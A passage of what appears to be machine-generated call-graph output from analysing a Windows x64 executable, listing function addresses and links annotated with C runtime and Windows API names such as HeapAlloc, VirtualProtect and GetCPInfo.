7ff738aaf070 73 API calls _wcsupr_s 76460->76523 76463 7ff738a9a930 76462->76463 76464 7ff738a9a926 76462->76464 76463->76429 76501 7ff738ab5d90 15 API calls _free_nolock 76464->76501 76467 7ff738a48d00 _free_nolock 15 API calls 76466->76467 76468 7ff738a5383b memcpy_s 76467->76468 76468->76431 76470 7ff738a8aa49 76469->76470 76471 7ff738a8aa3d 76469->76471 76505 7ff738a8aee0 76470->76505 76502 7ff738a8b0e0 76471->76502 76474 7ff738a8aa47 76475 7ff738aac660 76474->76475 76511 7ff738aa2a10 18 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76475->76511 76477 7ff738aac685 76477->76446 76479 7ff738aae3e6 76478->76479 76481 7ff738aae5dd 76479->76481 76512 7ff738a536b0 5 API calls 2 library calls 76479->76512 76481->76446 76485 7ff738a9e16f 76482->76485 76483 7ff738a9e273 76483->76446 76484 7ff738a9e1e6 76484->76483 76487 7ff738a9b460 18 API calls 76484->76487 76485->76484 76513 7ff738a9b460 76485->76513 76487->76484 76490 7ff738aa21c8 type_info::_name_internal_method 76488->76490 76489 7ff738aa2291 76489->76446 76490->76489 76517 7ff738a9e540 15 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76490->76517 76493 7ff738a9f775 76492->76493 76494 7ff738a9af63 76492->76494 76493->76494 76518 7ff738a536b0 5 API calls 2 library calls 76493->76518 76494->76451 76500 7ff738a536b0 5 API calls 2 library calls 76494->76500 76496->76446 76497->76446 76498->76446 76499->76446 76500->76451 76501->76463 76503 7ff738a8af50 7 API calls 76502->76503 76504 7ff738a8b13e 76503->76504 76504->76474 76506 7ff738a8af2e 76505->76506 76507 7ff738a8aefe 76505->76507 76506->76474 76508 7ff738a8ade0 VirtualProtect 76507->76508 76509 7ff738a8af20 76508->76509 76509->76506 76510 7ff738a8ae40 15 API calls 76509->76510 76510->76506 76511->76477 76512->76481 76514 7ff738a9b483 76513->76514 76515 7ff738a9b48d 76513->76515 76516 7ff738a9b410 18 API calls 76514->76516 76515->76485 76516->76515 76517->76490 76518->76494 76520 7ff738a8aee0 16 API calls 76519->76520 76521 7ff738a8aabe 76520->76521 76521->76456 76522->76458 76523->76455 76525 7ff738a3b3ed 76524->76525 76526 7ff738a48484 76524->76526 76528 7ff738a48420 76525->76528 76526->76525 76532 7ff738a4a690 76526->76532 76529 7ff738a48429 76528->76529 76530 7ff738a3b3f7 76529->76530 76543 7ff738a4a850 76529->76543 76530->76387 76533 7ff738a4a707 76532->76533 76538 7ff738a32f8a 76533->76538 76539 7ff738a32fab 76538->76539 76540 7ff738a3301d 76539->76540 76541 7ff738a50f90 strrchr 15 API calls 76539->76541 76542 7ff738a32420 76541->76542 76542->76542 76544 7ff738a4a888 76543->76544 76545 7ff738a4a8bd 76544->76545 76546 7ff738a4a9a3 wcsxfrm 76544->76546 76552 7ff738a4d720 15 API calls 2 library calls 76545->76552 76548 7ff738a4a690 15 API calls 76546->76548 76549 7ff738a4a99e 76546->76549 76548->76549 76549->76529 76550 7ff738a4a94c 76550->76549 76551 7ff738a4a690 15 API calls 76550->76551 76551->76549 76552->76550 76584 7ff738a577f0 76553->76584 76555 7ff738a577f0 _wcsupr_s 54 API calls 76562 7ff738a572d0 76555->76562 76556 7ff738a5731f 76558 7ff738a572f8 76556->76558 76589 7ff738a405a0 15 API calls 2 library calls 76556->76589 76558->76418 76560 7ff738a577f0 _wcsupr_s 54 API calls 76560->76562 76561 7ff738a5737f _wcsupr_s 76590 7ff738a40600 5 API calls _free_nolock 76561->76590 76562->76555 76562->76556 76562->76558 76563 7ff738a57315 76562->76563 76588 7ff738a578c0 54 API calls _wcsupr_s 76563->76588 76567 7ff738a64c45 76566->76567 76596 7ff738a65c90 76567->76596 76572 7ff738a64c90 76573 7ff738a64dd5 76572->76573 76625 7ff738a64e10 15 API calls 2 library calls 76572->76625 76573->76419 76577 7ff738a64c62 76577->76572 76608 7ff738a651c0 76577->76608 76612 7ff738a65170 76577->76612 76616 7ff738a64840 76577->76616 76623 7ff738a64e10 15 API calls 2 library calls 76577->76623 76624 7ff738a3ad60 15 API calls _free_nolock 76577->76624 76580->76423 76581->76413 76582->76419 76583->76421 76585 7ff738a57834 76584->76585 76586 7ff738a57250 76584->76586 76591 7ff738a57700 76585->76591 76586->76560 76586->76562 76588->76556 76589->76561 76590->76558 76595 7ff738a44600 39 API calls 76591->76595 76592 7ff738a57728 76593 7ff738a5773d 76592->76593 76594 7ff738a40690 _free_nolock 15 API calls 76592->76594 76593->76586 76594->76593 76595->76592 76597 7ff738a651c0 54 API calls 76596->76597 76604 7ff738a65ca8 76597->76604 76598 7ff738a64c4f 76598->76577 76622 7ff738a64e10 15 API calls 2 library calls 76598->76622 76599 7ff738a65d8b 76600 7ff738a65d96 std::rsfun 76599->76600 76601 7ff738a65dcf 76599->76601 76605 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 76600->76605 76603 7ff738a65170 54 API calls 76601->76603 76606 7ff738a65deb 76603->76606 76604->76598 76604->76599 76626 7ff738a7e570 15 API calls 4 library calls 76604->76626 76605->76598 76607 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 76606->76607 76607->76598 76609 7ff738a651e8 76608->76609 76610 7ff738a651f9 76608->76610 76627 7ff738a64ed0 76609->76627 76610->76577 76613 7ff738a651ac 76612->76613 76614 7ff738a65198 76612->76614 76613->76577 76615 7ff738a64ed0 54 API calls 76614->76615 76615->76613 76618 7ff738a6486e 76616->76618 76617 7ff738a48da0 task 15 API calls 76619 7ff738a649ac 76617->76619 76618->76617 76637 7ff738a65790 15 API calls type_info::_name_internal_method 76619->76637 76621 7ff738a64ad7 76621->76577 76622->76577 76623->76577 76624->76577 76625->76573 76626->76604 76628 7ff738a64eec 76627->76628 76629 7ff738a64e10 15 API calls 76628->76629 76635 7ff738a64f06 memcpy_s 76628->76635 76629->76635 76630 7ff738a64790 15 API calls 76630->76635 76631 7ff738a65023 76632 7ff738a65039 76631->76632 76633 7ff738a64e10 15 API calls 76631->76633 76632->76610 76633->76632 76634 7ff738a40690 _free_nolock 15 API calls 76634->76635 76635->76630 76635->76631 76635->76632 76635->76634 76636 7ff738a44600 39 API calls 76635->76636 76636->76635 76637->76621 76640 7ff738a58b40 10 API calls 76638->76640 76639 7ff738a56fda 76639->76397 76640->76639 76642 7ff738a56f90 _mbsncpy_s 10 API calls 76641->76642 76643 7ff738a5704b 76642->76643 76643->76229 76644->76232 76646->76246 76648 7ff738a4f707 wcsxfrm 76647->76648 76650 7ff738a4f81e 76648->76650 76653 7ff738a4f727 wcsxfrm 76648->76653 76655 7ff738a40a70 15 API calls 2 library calls 76650->76655 76652 7ff738a4f7f0 wcsxfrm 76652->76153 76653->76652 76656 7ff738a40950 15 API calls strrchr 76653->76656 76654->76156 76655->76652 76656->76652 76658 7ff738afa9a4 76657->76658 76674 7ff738afaa57 memcpy_s 76657->76674 76659 7ff738afaa67 76658->76659 76661 7ff738afa9bb 76658->76661 76665 7ff738b0ab1c _invalid_parameter_noinfo 14 API calls 76659->76665 76659->76674 76660 7ff738afaef8 _set_fmode 14 API calls 76662 7ff738a35487 76660->76662 76679 7ff738b091ac EnterCriticalSection 76661->76679 76675 7ff738a3dd30 76662->76675 76666 7ff738afaa83 76665->76666 76666->76674 76680 7ff738b0a290 76666->76680 76674->76660 76674->76662 76676 7ff738a3dd6f wcsxfrm 76675->76676 76677 7ff738a32f8a 15 API calls 76676->76677 76678 7ff738a354b8 76677->76678 76678->76166 76681 7ff738b0a2db 76680->76681 76686 7ff738b0a29f wcsftime 76680->76686 76683 7ff738afaef8 _set_fmode 14 API calls 76681->76683 76682 7ff738b0a2c2 HeapAlloc 76684 7ff738b0a2d9 76682->76684 76682->76686 76685 7ff738b0a2e0 76683->76685 76684->76685 76685->76674 76686->76681 76686->76682 76688 7ff738b1addc EnterCriticalSection LeaveCriticalSection wcsftime 76686->76688 76688->76686 76689->76173 76690->76175 76692 7ff738a4f8d7 76691->76692 76694 7ff738a4fb04 strrchr 76692->76694 76695 7ff738a4fb0b wcsxfrm 76692->76695 76698 7ff738a4f8fa wcsxfrm 76692->76698 76697 7ff738a4f941 wcsxfrm 76694->76697 76714 7ff738a40950 15 API calls strrchr 76694->76714 76695->76694 76713 7ff738a40a70 15 API calls 2 library calls 76695->76713 76697->76036 76698->76694 76698->76697 76699 7ff738a4fa6d 76698->76699 76703 7ff738a4fa81 76698->76703 76711 7ff738a40950 15 API calls strrchr 76699->76711 76701 7ff738a4fa7f 76705 7ff738a4d290 76701->76705 76703->76701 76712 7ff738a40950 15 API calls strrchr 76703->76712 76706 7ff738a4d2b2 __ExceptionPtrDestroy 76705->76706 76710 7ff738a4d321 __ExceptionPtrDestroy 76706->76710 76715 7ff738a4e560 76706->76715 76708 7ff738a4d30d 76719 7ff738a4d720 15 API calls 2 library calls 76708->76719 76710->76694 76711->76701 76712->76701 76713->76694 76714->76697 76716 7ff738a4e592 __ExceptionPtrDestroy 76715->76716 76720 7ff738a4caf0 76716->76720 76718 7ff738a4e691 _handle_error 76718->76708 76719->76710 76721 7ff738a4cb4b 76720->76721 76723 7ff738a4cbba __ExceptionPtrDestroy 76720->76723 76722 7ff738a4cb6a 76721->76722 76739 7ff738a40950 15 API calls strrchr 76721->76739 76725 7ff738a4cc29 76722->76725 76729 7ff738a4cb89 76722->76729 76727 7ff738a4ccde wcsxfrm __ExceptionPtrDestroy 76723->76727 76740 7ff738a4de50 15 API calls 2 library calls 76723->76740 76728 7ff738a48d00 _free_nolock 15 API calls 76725->76728 76732 7ff738a4cde6 76727->76732 76734 7ff738a4ce28 __ExceptionPtrDestroy 76727->76734 76741 7ff738a4d5c0 15 API calls __ExceptionPtrDestroy 76727->76741 76728->76723 76731 7ff738a48d00 _free_nolock 15 API calls 76729->76731 76730 7ff738a4cef4 76730->76718 76731->76723 76732->76734 76737 7ff738a48d00 _free_nolock 15 API calls 76732->76737 76733 7ff738a4cec5 76743 7ff738a4c460 76733->76743 76734->76730 76734->76733 76742 7ff738a4d720 15 API calls 2 library calls 76734->76742 76737->76734 76739->76722 76740->76727 76741->76727 76742->76734 76745 7ff738a58b40 10 API calls 76743->76745 76744 7ff738a4c4aa 76744->76730 76745->76744 76746->76048 76747->76055 76749 7ff738a77030 76748->76749 76750 7ff738a85a05 76748->76750 76752 7ff738a75e00 76749->76752 76750->76749 76751 7ff738a85910 _free_nolock 15 API calls 76750->76751 76751->76749 76756 7ff738a3d170 76752->76756 76755->75677 76758 7ff738a3d19a _mbsncpy_s 76756->76758 76757 7ff738a3d1be task 76764 7ff738a5ea10 76757->76764 76758->76757 76767 7ff738a40950 15 API calls strrchr 76758->76767 76761 7ff738a3d1d9 76763 7ff738a3d230 76761->76763 76768 7ff738a3ad60 15 API calls _free_nolock 76761->76768 76763->75675 76765 7ff738a48d00 _free_nolock 15 API calls 76764->76765 76766 7ff738a5ea3c 76765->76766 76766->76761 76767->76757 76768->76763 76770 7ff738a85dde 76769->76770 76771 7ff738a85df3 76769->76771 76772 7ff738a859d0 15 API calls 76770->76772 76773 7ff738a85910 _free_nolock 15 API calls 76771->76773 76776 7ff738a85dec type_info::_name_internal_method 76772->76776 76773->76776 76774 7ff738a76d17 76774->75684 76777 7ff738a41310 15 API calls __ExceptionPtrDestroy 76774->76777 76776->76774 76779 7ff738a41090 15 API calls 2 library calls 76776->76779 76777->75684 76778->75687 76779->76774 76781 7ff738a3fa90 wcsxfrm 76780->76781 76782 7ff738a3faa6 _free_nolock 76781->76782 76783 7ff738a3fb39 76781->76783 76785 7ff738a3fad6 wcsxfrm _mbsncpy_s 76781->76785 76782->75690 76847 7ff738a41310 15 API calls __ExceptionPtrDestroy 76783->76847 76846 7ff738a62a30 15 API calls type_info::_name_internal_method 76785->76846 76789 7ff738a3f9a0 wcsxfrm 76787->76789 76788 7ff738a3f9ab 76788->75705 76841 7ff738a41050 15 API calls __ExceptionPtrDestroy 76788->76841 76789->76788 76792 7ff738a3fa26 76789->76792 76848 7ff738a5f960 23 API calls wcsxfrm 76789->76848 76792->76788 76849 7ff738a41310 15 API calls __ExceptionPtrDestroy 76792->76849 76794 7ff738a7315d 76793->76794 76811 7ff738a73173 _free_nolock 76793->76811 76850 7ff738a41010 15 API calls std::rsfun 76794->76850 76796 7ff738a731ba 76800 7ff738a731cb 76796->76800 76801 7ff738a731ff 76796->76801 76797 7ff738a731f5 76797->75705 76799 7ff738a73235 76853 7ff738a739d0 15 API calls _free_nolock 76799->76853 76851 7ff738a73910 15 API calls 2 library calls 76800->76851 76852 7ff738a73910 15 API calls 2 library calls 76801->76852 76802 7ff738a72d30 15 API calls _free_nolock 76802->76811 76808 7ff738a73591 76857 7ff738a73790 15 API calls _free_nolock 76808->76857 76809 7ff738a735c0 76809->76797 76858 7ff738a73790 15 API calls _free_nolock 76809->76858 76811->76796 76811->76797 76811->76799 76811->76802 76811->76808 76811->76809 76812 7ff738a7360e 76811->76812 76815 7ff738a73120 _free_nolock 15 API calls 76811->76815 76854 7ff738a736a0 15 API calls __ExceptionPtrDestroy 76811->76854 76855 7ff738a41010 15 API calls std::rsfun 76811->76855 76856 7ff738a73a70 15 API calls 2 library calls 76811->76856 76859 7ff738a73870 15 API calls _free_nolock 76812->76859 76815->76811 76817 7ff738a74585 wcsxfrm 76816->76817 76818 7ff738a745aa 76817->76818 76820 7ff738a74597 76817->76820 76866 7ff738a74380 15 API calls _free_nolock 76818->76866 76822 7ff738a7459e 76820->76822 76823 7ff738a74605 76820->76823 76821 7ff738a745c3 76821->75705 76825 7ff738a3b5f0 wcsxfrm 15 API calls 76822->76825 76830 7ff738a745a5 76822->76830 76867 7ff738a73b10 15 API calls 2 library calls 76823->76867 76827 7ff738a745d7 76825->76827 76826 7ff738a7461b 76868 7ff738a3cd00 15 API calls 3 library calls 76826->76868 76860 7ff738a73c20 76827->76860 76831 7ff738a7463d 76830->76831 76839 7ff738a74670 wcsxfrm 76830->76839 76833 7ff738a3b4e0 wcsxfrm 15 API calls 76831->76833 76835 7ff738a7464c 76833->76835 76834 7ff738a3dce0 15 API calls 76834->76830 76869 7ff738a3c7a0 76835->76869 76837 7ff738a7466e 76876 7ff738a45250 15 API calls 2 library calls 76837->76876 76839->76837 76875 7ff738a40fa0 15 API calls std::rsfun 76839->76875 76841->75705 76842->75705 76843->75699 76844->75702 76845->75704 76846->76782 76847->76782 76848->76792 76849->76788 76850->76811 76851->76797 76852->76797 76853->76797 76854->76811 76855->76811 76856->76811 76857->76797 76858->76797 76859->76797 76861 7ff738a73c3e 76860->76861 76877 7ff738a3f460 76861->76877 76863 7ff738a73cb5 76863->76834 76865 7ff738a73c7d 76865->76863 76882 7ff738a73b10 15 API calls 2 library calls 76865->76882 76866->76821 76867->76826 76868->76830 76870 7ff738a3c7cf _mbsncpy_s 76869->76870 76871 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 76870->76871 76872 7ff738a3c7ed _free_nolock 76871->76872 76873 7ff738a3c844 76872->76873 76889 7ff738a3ad60 15 API calls _free_nolock 76872->76889 76873->76837 76875->76837 76876->76821 76883 7ff738a3b7d0 76877->76883 76880 7ff738a3f498 76880->76865 76882->76865 76884 7ff738a3b7e7 76883->76884 76885 7ff738a3b810 76883->76885 76884->76885 76888 7ff738a3f100 15 API calls _free_nolock 76884->76888 76885->76880 76887 7ff738a40fa0 15 API calls std::rsfun 76885->76887 76887->76880 76888->76885 76889->76873 76893 7ff738abf080 76890->76893 76894 7ff738abf0ed 76893->76894 76897 7ff738abf094 76893->76897 76895 7ff738abee23 76894->76895 76896 7ff738abf0f8 FreeLibrary 76894->76896 76895->75708 76896->76895 76897->76895 76898 7ff738abf0cb FreeLibrary 76897->76898 76898->76897 76900 7ff738a7ec5c 76899->76900 76902 7ff738a7ec8a 76900->76902 76903 7ff738a7ed48 76900->76903 76913 7ff738a41110 15 API calls 2 library calls 76900->76913 76914 7ff738ab77d0 94 API calls 3 library calls 76902->76914 76908 7ff738a7ed24 _handle_error 76903->76908 76916 7ff738a41050 15 API calls __ExceptionPtrDestroy 76903->76916 76905 7ff738a7ed08 76905->76908 76915 7ff738a40600 5 API calls _free_nolock 76905->76915 76908->75714 76910 7ff738a48da0 task 15 API calls 76909->76910 76911 7ff738a7ebdb __ExceptionPtrDestroy 76910->76911 76911->75720 76912->75716 76913->76900 76914->76905 76915->76908 76916->76908 76918 7ff738a75f8d 76917->76918 76919 7ff738a75f5d 76917->76919 76921 7ff738a75f9d 76918->76921 76922 7ff738a75fd9 76918->76922 76920 7ff738afaf9c _wcsupr_s 57 API calls 76919->76920 76926 7ff738a75f6a 76920->76926 76929 7ff738b03960 64 API calls 4 library calls 76921->76929 76924 7ff738a3c7a0 _free_nolock 15 API calls 76922->76924 76925 7ff738a76016 76924->76925 76925->75568 76930 7ff738a44d00 38 API calls 2 library calls 76926->76930 76928->75727 76929->76926 76930->76925 76932 7ff738a48d00 _free_nolock 15 API calls 76931->76932 76933 7ff738a3ad2f 76932->76933 76933->75737 76935 7ff738a40950 15 API calls strrchr 76933->76935 76934->75734 76935->75737 76937 7ff738a43d67 76936->76937 76938 7ff738a43cbf 76936->76938 76949 7ff738a42320 15 API calls _free_nolock 76937->76949 76948 7ff738a42320 15 API calls _free_nolock 76938->76948 76940 7ff738a4310f 76940->75744 76940->75745 76944 7ff738a54020 76942->76944 76943 7ff738a33037 _mbsncpy_s 94 API calls 76943->76944 76944->76943 76945 7ff738a54089 76944->76945 76945->75747 76946->75749 76947->75749 76948->76940 76949->76940 76950 7ff738a4ad8f 76955 7ff738a4a220 76950->76955 76952 7ff738a4ae3f 76957 7ff738a4a243 76955->76957 76956 7ff738a4a34a 76956->76952 76960 7ff738a4b310 15 API calls 3 library calls 76956->76960 76957->76956 76958 7ff738a4a220 10 API calls 76957->76958 76961 7ff738a4c9d0 76957->76961 76958->76957 76960->76952 76962 7ff738a4c9e9 76961->76962 76967 7ff738a4ca0f 76961->76967 76963 7ff738a4c460 __ExceptionPtrDestroy 10 API calls 76962->76963 76963->76967 76964 7ff738a4ca50 76965 7ff738a4ca8e 76964->76965 76968 7ff738a4ca64 76964->76968 76966 7ff738a4c460 __ExceptionPtrDestroy 10 API calls 76965->76966 76969 7ff738a4ca8c 76966->76969 76967->76964 76970 7ff738a4c460 __ExceptionPtrDestroy 10 API calls 76967->76970 76971 7ff738a4c460 __ExceptionPtrDestroy 10 API calls 76968->76971 76969->76957 76970->76964 76971->76969 76972 7ff738a34bb6 76978 7ff738a541f0 76972->76978 76975 7ff738a34d0e 76977 7ff738a34d99 76979 7ff738afaef8 _set_fmode 14 API calls 76978->76979 76980 7ff738a54206 GetLastError 76979->76980 76981 7ff738a5425c 76980->76981 76982 7ff738a33037 _mbsncpy_s 94 API calls 76981->76982 76983 7ff738a542f1 76982->76983 76986 7ff738a5444d 76983->76986 76993 7ff738a34c92 76983->76993 76996 7ff738aaee70 15 API calls 2 library calls 76983->76996 76985 7ff738a54394 76985->76986 76997 7ff738a53660 15 API calls _free_nolock 76985->76997 76990 7ff738a544ae _mbsncpy_s 76986->76990 76986->76993 76999 7ff738a56620 94 API calls 76986->76999 76989 7ff738afaef8 _set_fmode 14 API calls 76991 7ff738a54600 SetLastError 76989->76991 76990->76989 76991->76993 76992 7ff738a543b4 Concurrency::details::_UnrealizedChore::_CancelViaToken 76998 7ff738aaf070 73 API calls _wcsupr_s 76992->76998 76993->76975 76995 7ff738a40910 15 API calls 2 library calls 76993->76995 76995->76977 76996->76985 76997->76992 76998->76986 76999->76990 77000 7ff738a4c690 77001 7ff738a4dff0 wcsxfrm 15 API calls 77000->77001 77002 7ff738a4c6bd wcsxfrm 77001->77002 77003 7ff738a77930 77008 7ff738a3fb80 15 API calls 6 library calls 77003->77008 77005 7ff738a7794e 77009 7ff738b055c4 77005->77009 77007 7ff738a7795d 77008->77005 77037 7ff738ae1ab8 77009->77037 77012 7ff738b056ea 77043 7ff738b08b34 9 API calls _invalid_parameter_noinfo 77012->77043 77013 7ff738b05608 77014 7ff738b0560d 77013->77014 77015 7ff738b0562b 77013->77015 77018 7ff738b05621 77014->77018 77040 7ff738b10d88 31 API calls 4 library calls 77014->77040 77015->77018 77019 7ff738afaef8 _set_fmode 14 API calls 77015->77019 77042 7ff738b09294 14 API calls 2 library calls 77018->77042 77022 7ff738b05650 77019->77022 77024 7ff738afaef8 _set_fmode 14 API calls 77022->77024 77023 7ff738b05699 _handle_error 77023->77007 77025 7ff738b05657 77024->77025 77026 7ff738b05673 77025->77026 77027 7ff738b0567c 77025->77027 77028 7ff738afaef8 _set_fmode 14 API calls 77026->77028 77029 7ff738afaef8 _set_fmode 14 API calls 77027->77029 77028->77018 77030 7ff738b05681 77029->77030 77031 7ff738b0569e 77030->77031 77033 7ff738afaef8 _set_fmode 14 API calls 77030->77033 77032 7ff738afaef8 _set_fmode 14 API calls 77031->77032 77032->77018 77034 7ff738b0568b 77033->77034 77034->77031 77035 7ff738b05690 77034->77035 77041 7ff738b09294 14 API calls 2 library calls 77035->77041 77044 7ff738ae1748 77037->77044 77039 7ff738ae1ad2 77039->77012 77039->77013 77040->77018 77041->77023 77042->77023 77076 7ff738b091ac EnterCriticalSection 77044->77076 77046 7ff738ae1774 77047 7ff738ae177c 77046->77047 77050 7ff738ae179f 77046->77050 77048 7ff738afaef8 _set_fmode 14 API calls 77047->77048 77049 7ff738ae1781 77048->77049 77051 7ff738b08b14 _invalid_parameter_noinfo 23 API calls 77049->77051 77052 7ff738ae189c 41 API calls 77050->77052 77060 7ff738ae178d 77051->77060 77053 7ff738ae17a7 _CreateFrameInfo 77052->77053 77056 7ff738ae17e3 77053->77056 77057 7ff738ae17d3 77053->77057 77053->77060 77054 7ff738b09200 _isindst LeaveCriticalSection 77055 7ff738ae1807 77054->77055 77055->77039 77059 7ff738b08840 __std_exception_copy 23 API calls 77056->77059 77058 7ff738afaef8 _set_fmode 14 API calls 77057->77058 77058->77060 77061 7ff738ae17f1 77059->77061 77060->77054 77061->77060 77062 7ff738ae1824 77061->77062 77063 7ff738b08b34 _invalid_parameter_noinfo 9 API calls 77062->77063 77064 7ff738ae1838 _vswprintf 77063->77064 77065 7ff738ae184a 77064->77065 77069 7ff738ae1874 77064->77069 77066 7ff738afaef8 _set_fmode 14 API calls 77065->77066 77067 7ff738ae184f 77066->77067 77068 7ff738b08b14 _invalid_parameter_noinfo 23 API calls 77067->77068 77070 7ff738ae185a 77068->77070 77071 7ff738b091ac _isindst EnterCriticalSection 77069->77071 77070->77039 77072 7ff738ae187e 77071->77072 77073 7ff738ae189c 41 API calls 77072->77073 77074 7ff738ae1887 77073->77074 77075 7ff738b09200 _isindst LeaveCriticalSection 77074->77075 77075->77070 77077 7ff738add4e4 77102 7ff738add6a8 77077->77102 77080 7ff738add630 77130 7ff738add9d4 7 API calls 2 library calls 77080->77130 77081 7ff738add500 __scrt_acquire_startup_lock 77083 7ff738add63a 77081->77083 77084 7ff738add51e 77081->77084 77131 7ff738add9d4 7 API calls 2 library calls 77083->77131 77089 7ff738add53f __scrt_release_startup_lock 77084->77089 77110 7ff738b0675c 77084->77110 77087 7ff738add543 77088 7ff738add645 __FrameHandler3::FrameUnwindToEmptyState _free_nolock 77089->77087 77090 7ff738add5c9 77089->77090 77127 7ff738afadf8 26 API calls 77089->77127 77115 7ff738addb20 77090->77115 77092 7ff738add5ce 77118 7ff738b06688 77092->77118 77099 7ff738add5f1 77099->77088 77129 7ff738add83c 7 API calls __scrt_initialize_crt 77099->77129 77101 7ff738add608 77101->77087 77132 7ff738addc9c 77102->77132 77105 7ff738add4f8 77105->77080 77105->77081 77106 7ff738add6d7 77134 7ff738b08760 77106->77134 77111 7ff738b0676f 77110->77111 77112 7ff738b0678c 77111->77112 77322 7ff738add400 77111->77322 77339 7ff738ae1ae8 77111->77339 77112->77089 77419 7ff738ade110 77115->77419 77119 7ff738b1695c 37 API calls 77118->77119 77120 7ff738b06697 77119->77120 77121 7ff738add5d6 77120->77121 77421 7ff738b16c94 26 API calls _Wcsftime 77120->77421 77123 7ff738a350e0 77121->77123 77124 7ff738a350fd 77123->77124 77422 7ff738a36b70 77124->77422 77127->77090 77128 7ff738addb64 GetModuleHandleW 77128->77099 77129->77101 77130->77083 77131->77088 77133 7ff738add6ca __scrt_dllmain_crt_thread_attach 77132->77133 77133->77105 77133->77106 77136 7ff738b1ad18 77134->77136 77135 7ff738add6dc 77135->77105 77139 7ff738adf154 7 API calls 2 library calls 77135->77139 77136->77135 77140 7ff738b1695c 77136->77140 77146 7ff738b168a4 77136->77146 77139->77105 77141 7ff738b16969 77140->77141 77142 7ff738b169ae 77140->77142 77161 7ff738b0aa74 77141->77161 77142->77136 77147 7ff738b168c7 77146->77147 77149 7ff738b168d1 77147->77149 77321 7ff738b091ac EnterCriticalSection 77147->77321 77151 7ff738b16943 77149->77151 77153 7ff738b087cc __FrameHandler3::FrameUnwindToEmptyState 26 API calls 77149->77153 77151->77136 77155 7ff738b1695b 77153->77155 77157 7ff738b0aa74 26 API calls 77155->77157 77160 7ff738b169ae 77155->77160 77158 7ff738b16998 77157->77158 77159 7ff738b166e4 37 API calls 77158->77159 77159->77160 77160->77136 77162 7ff738b0aa8a 77161->77162 77163 7ff738b0aa85 77161->77163 77184 7ff738b0aa92 77162->77184 77205 7ff738b09828 6 API calls try_get_function 77162->77205 77204 7ff738b097e0 6 API calls try_get_function 77163->77204 77166 7ff738b0aaa9 77167 7ff738b0921c _invalid_parameter_noinfo 14 API calls 77166->77167 77166->77184 77169 7ff738b0aabc 77167->77169 77171 7ff738b0aada 77169->77171 77172 7ff738b0aaca 77169->77172 77208 7ff738b09828 6 API calls try_get_function 77171->77208 77206 7ff738b09828 6 API calls try_get_function 77172->77206 77173 7ff738b0ab0c 77186 7ff738b166e4 77173->77186 77176 7ff738b0aad1 77207 7ff738b09294 14 API calls 2 library calls 77176->77207 77177 7ff738b0aae2 77178 7ff738b0aaf8 77177->77178 77179 7ff738b0aae6 77177->77179 77210 7ff738b0a750 14 API calls _invalid_parameter_noinfo 77178->77210 77209 7ff738b09828 6 API calls try_get_function 77179->77209 77183 7ff738b0ab00 77211 7ff738b09294 14 API calls 2 library calls 77183->77211 77184->77173 77212 7ff738b087cc 77184->77212 77187 7ff738b168a4 37 API calls 77186->77187 77188 7ff738b1670d 77187->77188 77224 7ff738b163f0 77188->77224 77191 7ff738b16727 77191->77142 77192 7ff738b0a290 wcsftime 15 API calls 77194 7ff738b16738 77192->77194 77193 7ff738b167d3 77240 7ff738b09294 14 API calls 2 library calls 77193->77240 77194->77193 77231 7ff738b169d8 77194->77231 77197 7ff738b167c7 77198 7ff738b167ce 77197->77198 77201 7ff738b167f3 77197->77201 77199 7ff738afaef8 _set_fmode 14 API calls 77198->77199 77199->77193 77200 7ff738b16830 77200->77193 77242 7ff738b16234 23 API calls 5 library calls 77200->77242 77201->77200 77241 7ff738b09294 14 API calls 2 library calls 77201->77241 77205->77166 77206->77176 77207->77184 77208->77177 77209->77176 77210->77183 77211->77184 77221 7ff738afa6c0 EnterCriticalSection LeaveCriticalSection __FrameHandler3::FrameUnwindToEmptyState 77212->77221 77214 7ff738b087d5 77215 7ff738b087e4 77214->77215 77222 7ff738afa710 26 API calls 5 library calls 77214->77222 77217 7ff738b08817 __FrameHandler3::FrameUnwindToEmptyState 77215->77217 77218 7ff738b087ed IsProcessorFeaturePresent 77215->77218 77219 7ff738b087fc 77218->77219 77223 7ff738b08900 6 API calls 3 library calls 77219->77223 77221->77214 77222->77215 77223->77217 77225 7ff738ae3ea8 _Wcsftime 26 API calls 77224->77225 77226 7ff738b16404 77225->77226 77227 7ff738b16410 GetOEMCP 77226->77227 77228 7ff738b16422 77226->77228 77230 7ff738b16437 77227->77230 77229 7ff738b16427 GetACP 77228->77229 77228->77230 77229->77230 77230->77191 77230->77192 77232 7ff738b163f0 28 API calls 77231->77232 77233 7ff738b16a03 77232->77233 77234 7ff738b16a40 IsValidCodePage 77233->77234 77237 7ff738b16a83 __scrt_get_show_window_mode _handle_error 77233->77237 77235 7ff738b16a51 77234->77235 77234->77237 77236 7ff738b16a88 GetCPInfo 77235->77236 77239 7ff738b16a5a __scrt_get_show_window_mode 77235->77239 77236->77237 77236->77239 77237->77197 77243 7ff738b16500 77239->77243 77240->77191 77241->77200 77242->77193 77244 7ff738b1653d GetCPInfo 77243->77244 77245 7ff738b16633 _handle_error 77243->77245 77244->77245 77246 7ff738b16550 77244->77246 77245->77237 77252 7ff738b192ec 77246->77252 77248 7ff738b165c7 77265 7ff738b1e6ec 77248->77265 77251 7ff738b1e6ec 31 API calls 77251->77245 77253 7ff738ae3ea8 _Wcsftime 26 API calls 77252->77253 77254 7ff738b1932e 77253->77254 77270 7ff738b12ff4 77254->77270 77256 7ff738b19364 77257 7ff738b0a290 wcsftime 15 API calls 77256->77257 77258 7ff738b1936b _handle_error 77256->77258 77259 7ff738b19390 __scrt_get_show_window_mode wcsftime 77256->77259 77257->77259 77258->77248 77260 7ff738b12ff4 wcsftime MultiByteToWideChar 77259->77260 77261 7ff738b19428 77259->77261 77262 7ff738b1940a 77260->77262 77261->77258 77263 7ff738b09294 __free_lconv_mon 14 API calls 77261->77263 77262->77261 77264 7ff738b1940e GetStringTypeW 77262->77264 77263->77258 77264->77261 77266 7ff738ae3ea8 _Wcsftime 26 API calls 77265->77266 77267 7ff738b1e711 77266->77267 77273 7ff738b1e3d4 77267->77273 77269 7ff738b165fa 77269->77251 77271 7ff738b12ffc MultiByteToWideChar 77270->77271 77274 7ff738b1e416 77273->77274 77275 7ff738b12ff4 wcsftime MultiByteToWideChar 77274->77275 77277 7ff738b1e460 77275->77277 77276 7ff738b1e69f _handle_error 77276->77269 77277->77276 77278 